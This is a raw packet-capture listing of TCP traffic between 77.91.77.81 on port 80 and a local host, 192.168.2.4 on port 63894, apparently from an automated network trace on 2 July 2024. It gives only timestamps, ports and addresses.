                                            Jul 2, 2024 08:26:45.740912914 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740923882 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740930080 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740963936 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740986109 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.741267920 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.741311073 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.741319895 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.741326094 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.741359949 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.741430044 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.741472960 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.741516113 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.741571903 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.741580963 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.741586924 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.741638899 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.741647959 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.741681099 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767260075 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767275095 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767287970 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767324924 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767337084 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767347097 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767353058 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767359972 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767389059 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767410994 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767510891 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767523050 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767533064 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767555952 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767574072 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767625093 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767657995 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767684937 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767694950 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767705917 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767716885 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767719984 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767728090 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767738104 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767769098 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.767955065 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.767966032 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768012047 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.768271923 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768316031 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.768320084 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768331051 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768357038 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.768379927 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.768439054 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768449068 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768459082 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768471003 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768497944 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.768518925 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.768757105 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768790960 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768801928 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768802881 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.768831968 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.768855095 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.768949986 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768959999 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.768966913 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769049883 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.769069910 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769124031 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.769352913 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769397020 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.769428015 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769438028 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769448042 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769459009 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769473076 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.769500971 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.769593954 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769610882 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769620895 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769632101 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769633055 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.769643068 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769664049 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.769692898 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.769823074 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.769860029 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.770203114 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.770246029 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.770256996 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.770262003 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.770282984 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.770301104 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.770620108 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.770665884 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.770675898 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.770689011 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.770724058 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.770756006 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.770803928 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.770848989 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.770854950 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.770890951 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771073103 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771083117 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771096945 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771107912 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771116018 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771142960 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771152020 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771188021 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771255970 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771292925 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771320105 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771331072 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771354914 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771373987 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771454096 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771465063 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771475077 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771486044 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771492958 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771522045 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771804094 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771847010 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771869898 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771881104 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.771924973 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.771955013 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.772012949 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.772068024 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.772126913 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.772128105 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.772138119 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.772166967 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.772260904 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.772294998 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.773454905 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773464918 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773474932 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773509979 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.773520947 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773533106 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.773561954 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.773590088 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773601055 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773628950 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.773722887 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773757935 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.773777962 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773789883 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773799896 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773821115 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.773843050 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.773919106 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773931026 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773941994 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773952961 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.773961067 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.773996115 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.775866032 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.775908947 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.775922060 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.775933027 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.775973082 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.775990009 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.776000977 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.776011944 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.776030064 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.776036024 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.776061058 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.776073933 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.776088953 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.776114941 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.830776930 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.830806017 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.830821037 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.830832005 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.830842972 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.830846071 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.830874920 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.830914974 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.830967903 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.830981970 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.830995083 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831006050 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831010103 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831023932 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831057072 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831089020 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831159115 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831257105 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831269979 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831280947 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831298113 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831329107 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831484079 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831496954 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831531048 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831532001 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831543922 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831554890 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831556082 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831571102 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831583977 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831617117 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831849098 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831861019 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831903934 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831917048 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.831969023 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.831981897 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.832015991 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.832031965 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.832108021 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.832128048 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.832140923 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.832153082 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.832164049 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.832165003 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.832173109 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.832211971 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.859272003 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859337091 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859347105 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859407902 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.859426975 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859437943 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859447956 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859458923 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859483957 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.859502077 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.859682083 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859693050 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859702110 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859711885 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859720945 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859731913 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859736919 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.859757900 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.859817028 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.859823942 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859836102 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859873056 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.859980106 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.859992027 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860002041 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860012054 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860021114 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860029936 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.860049009 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.860059023 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.860255003 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860265970 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860276937 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860289097 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860297918 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860306978 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.860307932 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860318899 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860335112 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.860354900 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.860637903 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860649109 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860658884 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860667944 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860677004 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860687017 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860697031 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860697985 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.860707045 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860722065 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.860750914 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.860932112 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860943079 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.860981941 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.861392021 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.861452103 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.861463070 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.861493111 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.861505985 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.861681938 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.861692905 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.861702919 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.861713886 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.861736059 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.861752033 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.861771107 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.861867905 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.861879110 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.861896038 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.861920118 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.862000942 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862015963 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862025976 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862035990 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862046003 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862047911 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.862055063 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862071037 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.862091064 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.862247944 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862258911 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862270117 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862279892 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862289906 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862302065 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862310886 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.862343073 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.862464905 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862526894 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862528086 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.862539053 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862569094 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.862600088 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.862665892 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862677097 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862687111 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862698078 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.862721920 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.862761021 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864085913 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864094973 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864137888 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864140987 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864197016 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864229918 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864239931 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864249945 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864278078 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864309072 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864366055 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864377975 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864388943 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864423037 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864451885 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864455938 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864499092 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864571095 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864582062 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864592075 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864602089 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864612103 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864615917 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.864624023 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.864645958 CEST6389480192.168.2.477.91.77.81
